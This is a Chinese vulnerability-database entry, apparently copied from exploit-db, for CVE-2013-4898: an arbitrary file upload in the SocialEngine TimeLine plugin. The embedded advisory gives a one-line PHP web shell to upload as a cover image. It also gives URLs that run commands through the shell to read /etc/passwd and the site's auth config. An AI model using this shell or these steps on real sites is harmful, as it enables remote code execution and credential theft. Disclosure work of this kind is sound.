SocialEngine TimeLine插件权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121800 漏洞类型 权限许可和访问控制
发布时间 2013-08-02 更新时间 2013-08-05
CVE编号 CVE-2013-4898 CNNVD-ID CNNVD-201308-083
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/27272
https://www.securityfocus.com/bid/61622
https://cxsecurity.com/issue/WLB-2014020033
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-083
|漏洞详情
SocialEngine是美国SocialEngine团队开发的一套基于PHP的社交网络软件。TimeLine是其中的一个时间轴插件,该插件可记录发布文章、照片、视频等内容的时间。SocialEngineTimeline插件4.2.5p9版本中的‘userprofile’页面中存在任意文件上传漏洞。远程攻击者通过上传可执行的扩展文件到public/temporary/timeline/目录利用该漏洞执行任意代码。
|漏洞EXP
# Exploit Title: Sending php file in the timeline plugin cover image of SocialEngine 4.5 
# Date: 2013-08-17 
# Discovered by: Wesley Henrique Leite aka "spyk2r" 
# Vendor Homepage: http://webhive.com.ua/
# Software Link: http://webhive.com.ua/store/product.php?id_product=46
# Version: plugin Timeline 4.2.5p9 for SocialEngine 4.5 
# Vendor Notified: 2013-08-17
# CVE Notified: 2013-08-24
# CVE : CVE-2013-4898


+ INTRODUCTION

The plugin has the objective give you a better visual for the user
profile, allowed the addition of cover image keeping the layout closest
to the style of modern social networks, among other features.

+ DESCRIPTION OF VULNERABILITY

Logged into the system, enter on profile page of your user. [my profile]

    http://[url]/index.php/profile/[profile-name]

    >> Click "Change Cover"

    >> Click "Upload Cover"

select the file "*.php" you want to send.

//### Example PHP file to send "inject.php" ### 
    <?php echo system("$_GET['cmd']"); ?> 
//###

After selecting the file upload, this will be sent to an area temporarily,
the system detects that the format is not valid, but doesn’t remove,
allowing access later.

an error message is displayed on the screen.

[ File "/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php" 
is not an image or does not exist ]

+ ACCESS

    /srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php

The important thing is the structure of public forward, it will give 
us access to our archive.

    http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd

    http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php
|受影响的产品
Social Engine TimeLine 4.2.5p9
|参考资料

来源:BUGTRAQ
名称:20130805SocialEngine4.5TimeLine4.2.5p9uploadfile"PHP"intheCoverImage
链接:http://www.securityfocus.com/archive/1/527791
来源:EXPLOIT-DB
名称:27272
链接:http://www.exploit-db.com/exploits/27272/
来源:BID
名称:61622
链接:http://www.securityfocus.com/bid/61622